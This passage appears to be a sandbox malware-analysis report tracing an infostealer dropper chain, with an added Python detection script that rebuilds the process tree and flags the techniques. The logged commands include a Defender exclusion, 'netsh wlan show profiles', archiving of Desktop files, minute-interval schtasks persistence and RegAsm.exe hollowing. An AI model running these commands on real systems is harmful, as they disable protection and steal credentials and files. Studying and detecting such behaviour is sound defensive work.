Source: C:\Users\user\AppData\Local\Temp\1000075001\file300un.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: BDB008
Source: C:\Users\user\Desktop\1CMweaqlKp.exe Process created: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe "C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe"
Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe Process created: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe "C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe"
Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe Process created: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe "C:\Users\user\AppData\Local\Temp\1000019001\amert.exe"
Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe Process created: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe "C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe"
Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe Process created: C:\Users\user\1000021002\ac861238af.exe "C:\Users\user\1000021002\ac861238af.exe"
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe Process created: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe "C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe"
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dll, Main
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Process created: C:\Users\user\AppData\Local\Temp\1000066001\swiiiii.exe "C:\Users\user\AppData\Local\Temp\1000066001\swiiiii.exe"
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\a091ec0a6e2227\clip64.dll, Main
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Process created: C:\Users\user\AppData\Local\Temp\1000069001\NewB.exe "C:\Users\user\AppData\Local\Temp\1000069001\NewB.exe"
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Process created: C:\Users\user\AppData\Local\Temp\1000071001\jok.exe "C:\Users\user\AppData\Local\Temp\1000071001\jok.exe"
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Process created: C:\Users\user\AppData\Local\Temp\1000073001\swiiii.exe "C:\Users\user\AppData\Local\Temp\1000073001\swiiii.exe"
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Process created: C:\Users\user\AppData\Local\Temp\1000075001\file300un.exe "C:\Users\user\AppData\Local\Temp\1000075001\file300un.exe"
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Process created: unknown unknown
Source: C:\Users\user\1000021002\ac861238af.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.youtube.com/account
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\netsh.exe netsh wlan show profiles
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal
Source: C:\Users\user\AppData\Local\Temp\1000066001\swiiiii.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Users\user\AppData\Local\Temp\1000069001\NewB.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN NewB.exe /TR "C:\Users\user\AppData\Local\Temp\1000069001\NewB.exe" /F
Source: C:\Users\user\AppData\Local\Temp\1000069001\NewB.exe Process created: C:\Users\user\AppData\Local\Temp\1000234001\ISetup8.exe "C:\Users\user\AppData\Local\Temp\1000234001\ISetup8.exe"
Source: C:\Users\user\AppData\Local\Temp\1000069001\NewB.exe Process created: C:\Users\user\AppData\Local\Temp\1000235001\toolspub1.exe "C:\Users\user\AppData\Local\Temp\1000235001\toolspub1.exe"
Source: C:\Users\user\AppData\Local\Temp\1000069001\NewB.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1000234001\ISetup8.exe Process created: C:\Users\user\AppData\Local\Temp\u6po.0.exe "C:\Users\user\AppData\Local\Temp\u6po.0.exe"
Source: C:\Users\user\AppData\Local\Temp\1000073001\swiiii.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Users\user\AppData\Local\Temp\1000075001\file300un.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Temp\1000075001\file300un.exe" -Force
Source: C:\Users\user\AppData\Local\Temp\1000075001\file300un.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: unknown unknown
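The process-creation, memory-write and DebugPort observations above are the raw material for detection content. The following Python is an added example and not part of the Joe Sandbox report: it parses a constructed subset of this page's own "Source:" lines, rebuilds the dropper chain as a process tree and applies rules for the techniques the report flags (an RWX allocation plus an MZ-headed write into RegAsm.exe, with or without a section unmap; the Add-MpPreference exclusion; the minute-interval schtasks entry; netsh wlan show profiles; rundll32 loading a DLL from AppData\Roaming; repeated ProcessDebugPort queries). The rule names, the regex patterns, the DEBUGPORT_MIN threshold and the hard-coded tree root are this example's own assumptions.

```python
import re
from collections import Counter, defaultdict
# Constructed input: a subset of this report's own "Source:" lines, copied verbatim.
REPORT_LINES = r'''
Source: C:\Users\user\Desktop\1CMweaqlKp.exe Process created: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe "C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe"
Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe Process created: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe "C:\Users\user\AppData\Local\Temp\1000019001\amert.exe"
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe Process created: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe "C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe"
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dll, Main
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Process created: C:\Users\user\AppData\Local\Temp\1000066001\swiiiii.exe "C:\Users\user\AppData\Local\Temp\1000066001\swiiiii.exe"
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Process created: C:\Users\user\AppData\Local\Temp\1000069001\NewB.exe "C:\Users\user\AppData\Local\Temp\1000069001\NewB.exe"
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Process created: C:\Users\user\AppData\Local\Temp\1000075001\file300un.exe "C:\Users\user\AppData\Local\Temp\1000075001\file300un.exe"
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\netsh.exe netsh wlan show profiles
Source: C:\Users\user\AppData\Local\Temp\1000066001\swiiiii.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Users\user\AppData\Local\Temp\1000069001\NewB.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN NewB.exe /TR "C:\Users\user\AppData\Local\Temp\1000069001\NewB.exe" /F
Source: C:\Users\user\AppData\Local\Temp\1000075001\file300un.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Temp\1000075001\file300un.exe" -Force
Source: C:\Users\user\AppData\Local\Temp\1000075001\file300un.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe"
Source: C:\Users\user\AppData\Local\Temp\1000066001\swiiiii.exe Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\1000075001\file300un.exe Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\1000066001\swiiiii.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\Temp\1000075001\file300un.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\Temp\1000075001\file300un.exe Section unmapped: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base address: 400000
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Process queried: DebugPort
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1000235001\toolspub1.exe Process queried: DebugPort
'''.strip().splitlines()

RX = {  # one pattern per event kind the report prints
    "created": re.compile(r"^Source: (?P<src>.+?) Process created: (?P<child>.+?\.exe) (?P<cmd>.+)$"),
    "alloc": re.compile(r"^Source: (?P<src>.+?) Memory allocated: (?P<target>.+?) base: (?P<base>[0-9A-Fa-f]+) protect: (?P<prot>.+)$"),
    "write": re.compile(r"^Source: (?P<src>.+?) Memory written: (?P<target>.+?) base: (?P<base>[0-9A-Fa-f]+)(?: value starts with: (?P<magic>[0-9A-Fa-f]+))?$"),
    "unmap": re.compile(r"^Source: (?P<src>.+?) Section unmapped: (?P<target>.+?) base address: (?P<base>[0-9A-Fa-f]+)$"),
    "debugport": re.compile(r"^Source: (?P<src>.+?) Process queried: DebugPort$"),
}
CMDLINE_RULES = [  # LOLBin steps seen in the report, matched on the child's command line (names assumed)
    ("defender_exclusion", re.compile(r"add-mppreference.*-exclusionpath", re.I)),
    ("wifi_profile_dump", re.compile(r"netsh\s+wlan\s+show\s+profiles", re.I)),
    ("schtasks_minute_persistence", re.compile(r"schtasks.*\s/sc\s+minute\b", re.I)),
    ("rundll32_appdata_dll", re.compile(r'rundll32\.exe"?\s.*\\appdata\\roaming\\.*\.dll', re.I)),
]
DEBUGPORT_MIN = 2  # assumed threshold: repeated ProcessDebugPort queries, not a one-off

def parse(lines):
    events = []
    for line in lines:
        for kind, rx in RX.items():
            m = rx.match(line)
            if m:
                events.append((kind, m.groupdict()))
                break
    return events

def process_tree(events):  # parent path -> ordered, de-duplicated child paths
    children = defaultdict(list)
    for kind, e in events:
        if kind == "created" and e["child"] not in children[e["src"]]:
            children[e["src"]].append(e["child"])
    return children

def render_tree(children, node, depth=0, ancestors=()):
    lines = ["  " * depth + node.rsplit("\\", 1)[-1]]
    for c in children.get(node, []):
        if c != node and c not in ancestors:  # explorta.exe re-spawns itself: avoid loops
            lines += render_tree(children, c, depth + 1, ancestors + (node,))
    return lines

def detect_hollowing(events):
    # Injector created the target, allocated RWX at a base and wrote an MZ header there; an unmap at that base is the NtUnmapViewOfSection variant.
    created = {(e["src"], e["child"]) for k, e in events if k == "created"}
    rwx, mz, unmapped = defaultdict(set), defaultdict(set), defaultdict(set)
    for k, e in events:
        key, base = (e["src"], e.get("target")), e.get("base", "").upper()
        if k == "alloc" and "execute" in e["prot"] and "write" in e["prot"]:
            rwx[key].add(base)
        elif k == "write" and (e["magic"] or "").upper().startswith("4D5A"):
            mz[key].add(base)
        elif k == "unmap":
            unmapped[key].add(base)
    return [{"rule": "process_hollowing", "injector": key[0], "target": key[1],
             "base": base, "section_unmapped": base in unmapped[key]}
            for key in sorted(created & set(mz)) for base in sorted(mz[key] & rwx[key])]

def detect_antidebug(events):
    counts = Counter(e["src"] for k, e in events if k == "debugport")
    return [{"rule": "debugport_query", "process": p, "count": n}
            for p, n in counts.items() if n >= DEBUGPORT_MIN]

def run(lines):
    events = parse(lines)
    findings = detect_hollowing(events) + detect_antidebug(events)
    for k, e in events:
        if k == "created":
            findings += [{"rule": n, "parent": e["src"], "child": e["child"]}
                         for n, rx in CMDLINE_RULES if rx.search(e["cmd"])]
    return events, findings

if __name__ == "__main__":
    events, findings = run(REPORT_LINES)  # root below is the submitted sample from this report
    print(*render_tree(process_tree(events), r"C:\Users\user\Desktop\1CMweaqlKp.exe"), *findings, sep="\n")
```

Running it prints the chain 1CMweaqlKp.exe > explorta.exe > amert.exe > explorha.exe and, under explorha.exe, the payload stages that each hollow RegAsm.exe. The two hollowing findings differ only in section_unmapped: the report shows the unmap for file300un.exe but not for swiiiii.exe, which writes over the already-mapped image, so a rule that insists on NtUnmapViewOfSection would miss the second loader. On live endpoints the same logic is applied to process-creation and remote-memory telemetry (for example Sysmon event IDs 1, 8 and 10) rather than to sandbox text.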
Source: ac861238af.exe, 00000010.00000000.1932011901.0000000000762000.00000002.00000001.01000000.0000000E.sdmp Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: RageMP131.exe, 0000002E.00000002.2634385282.0000000000BB0000.00000040.00000001.01000000.0000001B.sdmp Binary or memory string: QProgram Manager
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Local\Temp\u6po.0.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Local\Temp\u6po.0.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe Queries volume information: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe Queries volume information: C:\Users\user\1000021002\ac861238af.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe Queries volume information: C:\Users\user\1000021002\ac861238af.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Queries volume information: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Queries volume information: C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Queries volume information: C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000066001\swiiiii.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000066001\swiiiii.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Queries volume information: C:\Users\user\AppData\Roaming\a091ec0a6e2227\clip64.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Queries volume information: C:\Users\user\AppData\Roaming\a091ec0a6e2227\clip64.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000069001\NewB.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000069001\NewB.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000071001\jok.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000071001\jok.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000073001\swiiii.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000073001\swiiii.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000075001\file300un.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000075001\file300un.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000077001\jfesawdr.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000077001\jfesawdr.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000079001\gold.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000079001\gold.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000080001\alexxxxxxxx.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000080001\alexxxxxxxx.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000081001\install.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000081001\install.exe VolumeInformation
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Users\user\Desktop\AIXACVYBSB.docx VolumeInformation
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Users\user\Desktop\DTBZGIOOSO.docx VolumeInformation
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Users\user\Desktop\DTBZGIOOSO.xlsx VolumeInformation
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Users\user\Desktop\HTAGVDFUIE.xlsx VolumeInformation
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Users\user\Desktop\ONBQCLYSPU.docx VolumeInformation
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Users\user\Desktop\ONBQCLYSPU.xlsx VolumeInformation
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Users\user\Desktop\UMMBDNEQBN.xlsx VolumeInformation
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Users\user\Desktop\XZXHAVGRAG.docx VolumeInformation
Source: C:\Windows\System32\netsh.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000066001\swiiiii.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000066001\swiiiii.exe VolumeInformation
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Queries volume information: C:\ VolumeInformation
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite VolumeInformation
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Queries volume information: unknown VolumeInformation
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
